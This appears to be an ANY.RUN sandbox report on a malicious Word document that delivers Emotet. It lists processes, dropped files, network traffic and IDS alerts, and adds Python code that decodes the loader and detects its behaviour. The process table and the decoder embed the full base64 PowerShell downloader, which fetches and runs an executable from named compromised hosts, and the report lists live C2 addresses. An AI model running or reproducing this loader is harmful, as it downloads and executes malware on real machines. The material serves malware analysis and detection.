| Field | Value |
|---|---|
| File name | 0-TOU-2019-697936.doc |
| Full analysis | https://app.any.run/tasks/9a947ddf-cf15-4057-9bad-a07cfbebc6cf |
| Verdict | Malicious activity |
| Threats | Emotet is a modular trojan that began as a banking trojan and was developed over its lifetime into a loader that delivers other malware. It mainly targets corporate networks, but private users are also infected through its mass spam email campaigns. |
| Analysis date | May 15, 2019, 08:58:10 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | — |
| Indicators | — |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 9 07:32:00 2019, Last Saved Time/Date: Thu May 9 07:32:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0 |
| MD5 | 7025E45671F6CD0B3FEF4A11D7659F96 |
| SHA1 | 2FED57400207D905780396C9815AC10BCBA42C48 |
| SHA256 | 0DB2072A0719D15F514B5FD212AB9444912E69E6336783343A992A194F236383 |
| SSDEEP | 3072:r77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qsQE1dS+XFLkvtb42:r77HUUUUUUUUUUUUUUUUUUUT52VeEiEC |
| Extension | Type | Match score |
|---|---|---|
| .doc | Microsoft Word document | 54.2 |
| .doc | Microsoft Word document (old ver.) | 32.2 |
| Property | Value |
|---|---|
| CompObjUserType | Microsoft Word 97-2003 Document |
| CompObjUserTypeLen | 32 |
| HeadingPairs | — |
| TitleOfParts | — |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 16 |
| CharCountWithSpaces | 7 |
| Paragraphs | 1 |
| Lines | 1 |
| Company | — |
| CodePage | Windows Latin 1 (Western European) |
| Security | None |
| Characters | 7 |
| Words | 1 |
| Pages | 1 |
| ModifyDate | 2019:05:09 06:32:00 |
| CreateDate | 2019:05:09 06:32:00 |
| TotalEditTime | — |
| Software | Microsoft Office Word |
| RevisionNumber | 1 |
| LastModifiedBy | — |
| Template | Normal.dotm |
| Comments | — |
| Keywords | — |
| Author | — |
| Subject | — |
| Title | — |
| PID | CMD | Path | Indicators | Parent process | Process details |
|---|---|---|---|---|---|
| 2832 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0-TOU-2019-697936.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 3416 | powErSHell -e JABqADcAMgA1ADQAMAA4AD0AJwBBADQAXwAyADMANAA3ACcAOwAkAFcANwA0ADIANwA2ACAAPQAgACcANAA0ACcAOwAkAGgANgA1ADgAMgAzADkAPQAnAE4ANQAyADIAOQA0ADYANQAnADsAJABOADQAOAAwADAAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVwA3ADQAMgA3ADYAKwAnAC4AZQB4AGUAJwA7ACQAdQA1ADgAOAA0ADAAOQA5AD0AJwBMADkAMgA1ADIAMgAnADsAJAB6ADYAMQA1ADQAMAAyADUAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AYABlAFQALgBXAGUAYABCAGMAYABMAEkAZQBgAE4AVAA7ACQASwA0ADcAMwAxADEAMAA0AD0AJwBoAHQAdABwAHMAOgAvAC8AdwBpAGgAYQBuAHMAdAB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA3AGcAaQA4AC8AQABoAHQAdABwAHMAOgAvAC8AaABhAHIAaQB0AGUALQBhAHIAZwBhAG4ALgBvAG4AbAB5AG8AbgBlAGkAZgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AMgA3ADYALwBAAGgAdAB0AHAAOgAvAC8AdgBpAGwAbABhAGcAZQBzAHQAdQBkAGkAbwAuAG4AZQB0AC8AdwBwAC0AYQBkAG0AaQBuAC8AawBuAGMAZQB4AGoANQAwADQANgA4ADEALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAGkAYQBuAGQAZQB2AGUAbABvAHAAZQByAHMALgBjAG8AbQAvAGIAbABvAGcAcwAvAHkAYwA2ADAAMwAwAC8AQABoAHQAdABwAHMAOgAvAC8AdQBzAHQAYQBtAHMAZQByAHYAaQBzAC4AbgBlAHQALwB5AGUAZABlAGsALwB6ADEAagA5ADYAMwA2ADIALwAnAC4AUwBQAEwASQB0ACgAJwBAACcAKQA7ACQAdwAxADIANgA1AF8APQAnAHYAMgAzADkAOABfACcAOwBmAG8AcgBlAGEAYwBoACgAJABrADgANgAwADIAMQA0ACAAaQBuACAAJABLADQANwAzADEAMQAwADQAKQB7AHQAcgB5AHsAJAB6ADYAMQA1ADQAMAAyADUALgBEAE8AdwBuAGwATwBBAEQARgBpAEwARQAoACQAawA4ADYAMAAyADEANAAsACAAJABOADQAOAAwADAAMQApADsAJABPAF8AMQA5ADEAOQA9ACcAZgAzADYANgA0ADgAMQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAE4ANAA4ADAAMAAxACkALgBsAGUAbgBnAFQAaAAgAC0AZwBlACAAMwAyADMAMQA2ACkAIAB7AC4AKAAnAEkAbgB2AG8AawBlACcAKwAnAC0AJwArACcASQB0AGUAbQAnACkAIAAkAE4ANAA4ADAAMAAxADsAJABZADIANwA0AF8AOAA9ACcAegA4ADcANAA2ADQAJwA7AGIAcgBlAGEAawA7ACQASQAyADIAMwAzADIAOAA4AD0AJwBXADMAMAAzADIANwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADMAOQBfADEANAA5AD0AJwBoAF8AMwA4ADMAMgA2ADYAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3956 | "C:\Users\admin\44.exe" | C:\Users\admin\44.exe | — | powErSHell.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 880 | --f9b6674a | C:\Users\admin\44.exe | — | 44.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 2632 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | 44.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 3468 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe | User: admin; Integrity Level: MEDIUM |
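The PowerShell command of PID 3416 is the usual `-e` form: base64 over the UTF-16LE text of the script. The script hides its cmdlet names by building them from string fragments (`.('new-'+'obje'+'ct')`) and by scattering backticks inside identifiers (N`eT.We`Bc`LIe`NT), then walks a list of download URLs in order, saves whatever it gets as `%USERPROFILE%\44.exe`, and runs that file as soon as a download of at least 32316 bytes succeeds. The Python below is an added example and not part of the ANY.RUN report: it decodes that exact argument, undoes the two obfuscation tricks, and extracts the URL list, the drop name and the size gate; the function names are mine. Read against the network tables further down, the URL order explains what the sandbox saw: the first two hosts were reached only over TLS (connections, no visible request), villagestudio.net answered 404 with a 2-byte body, www.miandevelopers.com served the 73.5 KB executable that became PID 3956, and the loop's `break` is why ustamservis.net was never contacted.

```python
import base64
import re

# The -e argument of the PID 3416 PowerShell process, copied from the process
# table above; it is split into several literals only for readability.
ENCODED_COMMAND = (
    "JABqADcAMgA1ADQAMAA4AD0AJwBBADQAXwAyADMANAA3ACcAOwAkAFcANwA0ADIANwA2ACAAPQAgACcANAA0ACcAOwAkAGgANgA1ADgAMgAzADkAPQAnAE4ANQAyADIAOQA0ADYANQAnADsA"
    "JABOADQAOAAwADAAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVwA3ADQAMgA3ADYAKwAnAC4AZQB4AGUAJwA7ACQAdQA1ADgAOAA0ADAAOQA5AD0AJwBMADkAMgA1ADIAMgAnADsA"
    "JAB6ADYAMQA1ADQAMAAyADUAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AYABlAFQALgBXAGUAYABCAGMAYABMAEkAZQBgAE4AVAA7ACQASwA0ADcAMwAxADEAMAA0AD0A"
    "JwBoAHQAdABwAHMAOgAvAC8AdwBpAGgAYQBuAHMAdAB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA3AGcAaQA4AC8AQABoAHQAdABwAHMAOgAvAC8A"
    "aABhAHIAaQB0AGUALQBhAHIAZwBhAG4ALgBvAG4AbAB5AG8AbgBlAGkAZgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AMgA3ADYALwBAAGgAdAB0AHAAOgAvAC8A"
    "dgBpAGwAbABhAGcAZQBzAHQAdQBkAGkAbwAuAG4AZQB0AC8AdwBwAC0AYQBkAG0AaQBuAC8AawBuAGMAZQB4AGoANQAwADQANgA4ADEALwBAAGgAdAB0AHAAOgAvAC8A"
    "dwB3AHcALgBtAGkAYQBuAGQAZQB2AGUAbABvAHAAZQByAHMALgBjAG8AbQAvAGIAbABvAGcAcwAvAHkAYwA2ADAAMwAwAC8AQABoAHQAdABwAHMAOgAvAC8A"
    "dQBzAHQAYQBtAHMAZQByAHYAaQBzAC4AbgBlAHQALwB5AGUAZABlAGsALwB6ADEAagA5ADYAMwA2ADIALwAnAC4AUwBQAEwASQB0ACgAJwBAACcAKQA7ACQAdwAxADIANgA1AF8APQAnAHYAMgAzADkAOABfACcA"
    "OwBmAG8AcgBlAGEAYwBoACgAJABrADgANgAwADIAMQA0ACAAaQBuACAAJABLADQANwAzADEAMQAwADQAKQB7AHQAcgB5AHsA"
    "JAB6ADYAMQA1ADQAMAAyADUALgBEAE8AdwBuAGwATwBBAEQARgBpAEwARQAoACQAawA4ADYAMAAyADEANAAsACAAJABOADQAOAAwADAAMQApADsA"
    "JABPAF8AMQA5ADEAOQA9ACcAZgAzADYANgA0ADgAMQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAE4ANAA4ADAAMAAxACkALgBsAGUAbgBnAFQAaAAgAC0AZwBlACAAMwAyADMAMQA2ACkAIAB7"
    "AC4AKAAnAEkAbgB2AG8AawBlACcAKwAnAC0AJwArACcASQB0AGUAbQAnACkAIAAkAE4ANAA4ADAAMAAxADsA"
    "JABZADIANwA0AF8AOAA9ACcAegA4ADcANAA2ADQAJwA7AGIAcgBlAGEAawA7ACQASQAyADIAMwAzADIAOAA4AD0AJwBXADMAMAAzADIANwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADMAOQBfADEANAA5AD0AJwBoAF8AMwA4ADMAMgA2ADYAJwA="
)


def decode_encoded_command(blob: str) -> str:
    """PowerShell -e / -EncodedCommand is base64 over the UTF-16LE script text."""
    return base64.b64decode(blob).decode("utf-16le")


_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def deobfuscate(script: str) -> str:
    """Undo the two tricks this loader uses; nothing is executed."""
    # A backtick before an ordinary letter inside a bare identifier (N`eT) is a
    # no-op, so dropping it restores the name. Inside double-quoted strings `n,
    # `t and friends would be real escapes, but this script only uses single quotes.
    script = re.sub(r"`(?=[A-Za-z])", "", script)
    # 'new-'+'obje'+'ct' is just 'new-object'; each pass merges one adjacent pair.
    while True:
        merged = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        if merged == script:
            break
        script = merged
    # .('Get-Item') is the call operator applied to a string: it is the cmdlet itself.
    return re.sub(r"\.\('([^']+)'\)", r"\1", script)


def extract_iocs(script: str) -> dict:
    """Pull the download list, the drop file name and the size gate out of the
    deobfuscated script by resolving the string variables it assigns."""
    literals = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", script))
    urls = re.findall(r"https?://[^'\"@\s]+", script)
    drop = re.search(r"\$env:userprofile\+'\\'\+\$(\w+)\+'\.exe'", script, re.I)
    size = re.search(r"\.length\s+-ge\s+(\d+)", script, re.I)
    return {
        "urls": urls,
        "drop_name": literals[drop.group(1)] + ".exe" if drop else None,
        "min_size": int(size.group(1)) if size else None,
    }


def analyse(blob: str) -> dict:
    script = deobfuscate(decode_encoded_command(blob))
    return {"script": script, **extract_iocs(script)}


if __name__ == "__main__":
    result = analyse(ENCODED_COMMAND)
    print(result["script"])
    for url in result["urls"]:
        print("download URL:", url)
    print("drop name:", result["drop_name"], "| minimum size:", result["min_size"])
```

The size gate is worth keeping in mind when reproducing the download: a URL that answers with an error page (as villagestudio.net did here) is silently skipped, so only the first URL that returns at least 32316 bytes determines which sample actually ran.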
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE31.tmp.cvr | — | — | — |
| 3416 | powErSHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\34SKVHFRPNT5XULSBHR4.temp | — | — | — |
| 3416 | powErSHell.exe | C:\Users\admin\44.exe | — | — | — |
| 3416 | powErSHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF121787.TMP | binary | 16D0FD6E07266B2C15A9D7BC6623F506 | 833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B |
| 2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$TOU-2019-697936.doc | pgc | CD04DC344AC842F02A393B321AA77AC6 | B94E1F60138A056B7625313012C9014848C05B06FB8EFC25C86FA0192EDA910B |
| 2832 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 5AB8FDB550CEF33A41135907EDACEA21 | B313EC3B7731E49E8197F3027D1E9BB7650F7DE250BEC72E876D9FBE7B5D72C8 |
| 880 | 44.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | C032E789BE6923B376A055A04670ED38 | 8208F564963C1B1EC3DAC937603A9B4252577C5D828F1B4403B39BDB3EB2421F |
| 2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 8756142591BC409ACB378786286D1A30 | 633CE5DF7C8B502ED71BA62D162D24BDE15AE47ADAEC409FE3288B2E3B92B7E3 |
| 3416 | powErSHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 16D0FD6E07266B2C15A9D7BC6623F506 | 833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3416 | powErSHell.exe | GET | 200 | 182.50.135.114:80 | http://www.miandevelopers.com/blogs/yc6030/ | SG | executable | 73.5 KB | suspicious
3468 | soundser.exe | POST | — | 181.16.127.226:443 | http://181.16.127.226:443/mult/loadan/ | AR | — | — | malicious |
3416 | powErSHell.exe | GET | 404 | 209.182.200.165:80 | http://villagestudio.net/wp-admin/kncexj504681/ | US | text | 2 b | malicious |
3468 | soundser.exe | POST | — | 201.217.67.3:80 | http://201.217.67.3/srvc/img/ringin/merge/ | EC | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3416 | powErSHell.exe | 188.166.193.247:443 | harite-argan.onlyoneif.com | Digital Ocean, Inc. | DE | unknown |
3416 | powErSHell.exe | 104.18.52.149:443 | wihanstudio.com | Cloudflare Inc | US | shared |
3416 | powErSHell.exe | 209.182.200.165:80 | villagestudio.net | InMotion Hosting, Inc. | US | malicious |
— | — | 201.217.67.3:80 | — | Satnet | EC | malicious |
3416 | powErSHell.exe | 182.50.135.114:80 | www.miandevelopers.com | GoDaddy.com, LLC | SG | suspicious |
3468 | soundser.exe | 181.16.127.226:443 | — | Ver Tv S.A. | AR | malicious |
| Domain | IP | Reputation |
|---|---|---|
| wihanstudio.com | — | suspicious |
| harite-argan.onlyoneif.com | — | unknown |
| villagestudio.net | — | malicious |
| www.miandevelopers.com | — | suspicious |
PID | Process | Class | Message |
---|---|---|---|
3416 | powErSHell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3416 | powErSHell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3416 | powErSHell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3468 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 6 |
3468 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 15 |
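Taken together, the process, file and network tables show four behaviours that are easy to turn into host and proxy checks: PowerShell with an encoded command whose parent is wmiprvse.exe rather than WINWORD.EXE (the macro starts it through WMI, so the child does not sit under Word in the process tree), an executable running straight out of the user profile root, a binary that relaunches itself with nothing but an 8-hex-digit `--` switch and then installs a renamed copy under %LOCALAPPDATA%, and POST requests to bare IP addresses. The Python below is an added example of mine, not part of the ANY.RUN report; the process and HTTP rows are transcribed from the tables above (the encoded PowerShell argument is shortened to a prefix, which is all the rule needs), and the rule names and parent list are my assumptions.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str    # full path, as in the "Path" column
    cmdline: str  # as in the "CMD" column
    parent: str   # parent image name, as in the "Parent process" column


# Rows transcribed from the process table of this report. The base64 argument
# of PID 3416 is cut to its first characters; the rule only needs a prefix.
PROCS = [
    Proc(2832, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
         r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
         r'"C:\Users\admin\AppData\Local\Temp\0-TOU-2019-697936.doc"', "explorer.exe"),
    Proc(3416, r"C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exe",
         "powErSHell -e JABqADcAMgA1ADQAMAA4AD0AJwBBADQAXwAyADMANAA3ACcAOwAkAFcANwA0ADIANwA2ACAAPQAgACcA",
         "wmiprvse.exe"),
    Proc(3956, r"C:\Users\admin\44.exe", r'"C:\Users\admin\44.exe"', "powErSHell.exe"),
    Proc(880, r"C:\Users\admin\44.exe", "--f9b6674a", "44.exe"),
    Proc(2632, r"C:\Users\admin\AppData\Local\soundser\soundser.exe",
         r'"C:\Users\admin\AppData\Local\soundser\soundser.exe"', "44.exe"),
    Proc(3468, r"C:\Users\admin\AppData\Local\soundser\soundser.exe", "--3ab57678", "soundser.exe"),
]

# Rows from the HTTP requests table: (pid, method, url).
HTTP = [
    (3416, "GET", "http://www.miandevelopers.com/blogs/yc6030/"),
    (3468, "POST", "http://181.16.127.226:443/mult/loadan/"),
    (3416, "GET", "http://villagestudio.net/wp-admin/kncexj504681/"),
    (3468, "POST", "http://201.217.67.3/srvc/img/ringin/merge/"),
]

ENCODED_PS = re.compile(r"(?i)\bpowershell(?:\.exe)?\b.*\s-e(?:c|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}")
PROFILE_ROOT_EXE = re.compile(r"(?i)^[a-z]:\\Users\\[^\\]+\\[^\\]+\.exe$")
HEX_SWITCH = re.compile(r"^--[0-9a-f]{8}$")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Parents under which an encoded PowerShell command is worth an alert (my choice).
SUSPECT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "wmiprvse.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def encoded_powershell_from_office_or_wmi(procs):
    """PowerShell with an encoded command whose parent is an Office application or
    the WMI provider host (macros calling Win32_Process.Create land under wmiprvse.exe)."""
    return [p.pid for p in procs
            if ENCODED_PS.search(p.cmdline) and p.parent.lower() in SUSPECT_PARENTS]


def exe_in_profile_root(procs):
    """Executables running directly out of C:\\Users\\<user>\\, the loader's drop location."""
    return [p.pid for p in procs if PROFILE_ROOT_EXE.match(p.image)]


def self_relaunch_with_hex_switch(procs):
    """A process started by a copy of itself with only an 8-hex-digit --switch argument."""
    return [p.pid for p in procs
            if basename(p.image) == p.parent.lower() and HEX_SWITCH.match(p.cmdline)]


def post_to_bare_ip(http):
    """POST requests addressed to an IPv4 literal instead of a hostname."""
    return [(pid, url) for pid, method, url in http
            if method == "POST" and IPV4.match(urlsplit(url).hostname or "")]


if __name__ == "__main__":
    print("encoded PowerShell from Office/WMI:", encoded_powershell_from_office_or_wmi(PROCS))
    print("exe in profile root:", exe_in_profile_root(PROCS))
    print("self-relaunch with --hex switch:", self_relaunch_with_hex_switch(PROCS))
    print("POST to bare IP:", post_to_bare_ip(HTTP))
```

The self-relaunch rule fires twice here, once for 44.exe (PID 880) and once for the persisted copy soundser.exe (PID 3468), which is the pattern to look for when the same family shows up with a different drop name.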